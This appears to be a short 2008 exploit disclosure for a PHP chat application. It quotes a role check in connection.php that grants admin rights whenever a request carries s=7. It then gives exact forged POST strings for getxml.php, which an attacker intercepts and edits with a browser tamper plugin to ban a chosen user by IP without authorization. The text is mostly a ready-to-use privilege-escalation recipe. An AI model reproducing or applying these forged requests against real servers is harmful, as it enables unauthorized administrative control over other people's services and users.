File: connection.php if( ChatServer::userInRole($this->userid, ROLE_ADMIN) || ChatServer::userInRole($this->userid, ROLE_MODERATOR) || ($req['s'] == 7) <-- *bypass line* ) This piece of code allows a normal user to bypass role filtering and to be granted admin role as a normal user. To exploit the vulnerability simply send to getxml.php, while into the chat, this post data string (for example intercepting and modifying a legal message packet sent to the server with tamper data plugin of firefox): for example to ban a user simply add the bypass to the normal ban string request: replace: //normal message sent to server thas has being intercepted sendAndLoad=%5Btype%20Function%5D&t=hi everybody&r=0&id= with: //normal ban packet used by admins or mods sendAndLoad=%5Btype%20Function%5D&t=&r=0&u=5581&b=3&c=banu&cid=1&id= //forged packet send by attacker sendAndLoad=%5Btype%20Function%5D&s=7&t=&r=0&u=5581&b=3&c=banu&cid=1&id= *note the s=7 added this will ip-ban user with id 5581 from chat. eLiSiA - 17-10-2008
